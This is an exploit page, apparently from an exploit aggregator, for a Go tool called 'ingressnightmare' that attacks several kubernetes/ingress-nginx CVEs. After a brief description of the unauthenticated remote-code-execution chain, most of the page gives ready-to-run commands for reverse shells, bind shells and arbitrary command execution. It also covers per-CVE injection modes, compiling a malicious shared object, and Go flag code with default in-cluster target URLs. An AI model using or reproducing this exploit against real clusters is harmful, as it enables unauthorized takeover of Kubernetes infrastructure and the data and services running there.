Exploit for CVE-2025-1097 CVE-2025-1098 CVE-2025-1097 CVE-2025-24514 CVE-2025-1907

Name: Exploit for CVE-2025-1097 CVE-2025-1098 CVE-2025-1097 CVE-2025-24514 CVE-2025-1907
Rating: 5 (92 reviews)
2025-03-26 | CVSS 8.8
## https://sploitus.com/exploit?id=291CFD77-FB40-5A78-9EA7-BEFB70BFDCB2
# Ingress Nightmare CVE-2025-1907

## Description

This vulnerability allows remote attackers to execute arbitrary 
code on affected installations of kubernetes/ingress-nginx.
Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of HTTP requests.

It is triggered by sending two request. One is a long buffered 
request to the NGINX server in same pod, then nginx will cache
it as a temporary file. The second request is a request to the
admission validating webhook server, which will trigger the 
admission webhook to write a temporary nginx config which contains
the `ssl_engine badso_location;` directive. Then the admission 
webhook will run `nginx -t` to check the config, which will 
triggered remote code execution in the context of the NGINX server.

## Exploitation

```bash
# reverse shell 
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER} 

# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER} 

# blind command execution
./ingressnightmare -m c  -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER} 

# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url 
# same as 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
 
# for CVE-2025-1097 - auth-tls-match-cn injection,
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}

# for CVE-2025-1098 – mirror UID injection -- all available
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-uid 

## Advanced usage
# Send only admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-uid ...

# Send only upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload

# dry run mode
## dry run to lookup payload so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run 
# dump with > /tmp/evil.so

## dry run to lookup raw nginx admission 
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-uid ...

## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'

## if get error like Exec format error, that means the payload is not compatible with the target system.
## It maybe caused by the target system is arm64, but the payload is x86_64.
## Also the libc version and kernel version may cause this error.
## This exp Works on 5.10 kernel without libc.
## recompile c
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingresnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}
```

### FlagGroups

The exploit flags are so complex that I have to group them into several groups.

```go
	{
		// Set Targets Groups
		ExpCmd.Flags().StringVarP(&Opts.IngressWebhookUrl, "ingress-webhook-url", "i",
			"https://ingress-nginx-controller-admission.ingress-nginx.svc.cluster.local:443",
			"ingress webhook url")
		ExpCmd.Flags().StringVarP(&Opts.UploadUrl, "upload-url", "u",
			"http://ingress-nginx-controller.ingress-nginx.svc.cluster.local:80",
			"upload url")
		// This two value is default value, but you can set it to other value if you found uncommon ingress-nginx webhook url
	}

	{
		// Set Exploit Method for which CVE
		ExpCmd.Flags().BoolVarP(&Opts.IsAuthURL, "is-auth-url", "a", true, "CVE-2025-24514: using auth-url to attack (default)")
		ExpCmd.Flags().BoolVarP(&Opts.IsAuthTLSMatchCN, "is-match-cn", "A", false, "CVE-2025-1097: using auth-tls-match-cn to attack (not default)")
		ExpCmd.Flags().StringVarP(&Opts.AuthSecret, "auth-secret-name", "U", "", "if using auth-tls-match-cn, secret name is required, example: kube-system/cilium-ca")
		ExpCmd.Flags().BoolVarP(&Opts.IsMirrorWithUID, "is-mirror-with-uid", "M", false, "CVE-2025-1098: using mirror with uid")
		ExpCmd.MarkFlagsRequiredTogether("is-match-cn", "auth-secret-name")
	}

	{
		// Set Exploit Mode for reverse shell / bind shell / command
        // this is required group 
		ExpCmd.Flags().StringVarP(&Opts.Mode, "mode", "m", "", "mode reverse-shell(r)/bind-shell(b)/command(c)")
		_ = ExpCmd.MarkFlagRequired("mode")
		ExpCmd.Flags().IPVarP(&Opts.ReverseShellIp, "reverse-shell-ip", "r", defaultPodIp(), "reverse shell ip")
		ExpCmd.Flags().Uint16VarP(&Opts.ReverseShellPort, "reverse-shell-port", "p", 0, "reverse shell port")
		ExpCmd.Flags().Uint16VarP(&Opts.BindShellPort, "bind-shell-port", "b", 0, "bind shell port")
		ExpCmd.Flags().StringVarP(&Opts.Command, "command", "c", "", "command")
		ExpCmd.MarkFlagsRequiredTogether("reverse-shell-ip", "reverse-shell-port")
	}

	{
		// Debug modes
		ExpCmd.PersistentFlags().CountVarP(&Opts.Verbose, "verbose", "v", "verbose output") // debug is -v ; trace is -vv
		ExpCmd.PersistentFlags().BoolVarP(&Opts.DryRun, "dry-run", "d", false, "dry run and dump payload") // dump payload only
	}

	{
		// test Only Upload Thread / Only Admission Thread modes
		ExpCmd.Flags().BoolVarP(&Opts.OnlyAdmission, "only-admission", "o", false, "only admission")
		ExpCmd.Flags().StringVarP(&Opts.OnlyAdmissionFilePath, "only-admission-file", "f", "", "only admission file")
		ExpCmd.Flags().BoolVarP(&Opts.OnlyUpload, "only-upload", "O", false, "only upload")
		ExpCmd.MarkFlagsRequiredTogether("only-admission", "only-admission-file")
	}

	{
		// Set guessed PID and FD ranges
		ExpCmd.Flags().IntVarP(&Opts.PidRangeStart, "pid-range-start", "S", 5, "pid range start")
		ExpCmd.Flags().IntVarP(&Opts.PidRangeEnd, "pid-range-end", "E", 40, "distance to pid range end")
		ExpCmd.Flags().IntVarP(&Opts.FdRangeStart, "fd-range-start", "s", 3, "fd range start")
		ExpCmd.Flags().IntVarP(&Opts.FdRangeEnd, "fd-range-end", "e", 26, "distance fd range end")
	}

	{
		// Advanced Payload: custom so file or json template
		ExpCmd.Flags().StringVar(&Opts.SoFile, "so", "",
			"custom so file exploit, if u get Exec format error, "+
				"please recompile the so file from c code. ps: execute `./ingressnightmare show-c` to get source code")
		ExpCmd.Flags().StringVarP(&Opts.ValidateJsonTemplate, "validate-json-template", "t", "", " validate json template, using foobar as placeholder to filepath ")
	}
```


https://github.com/user-attachments/assets/415d6b81-b907-4aaa-bd99-18640bd64b2b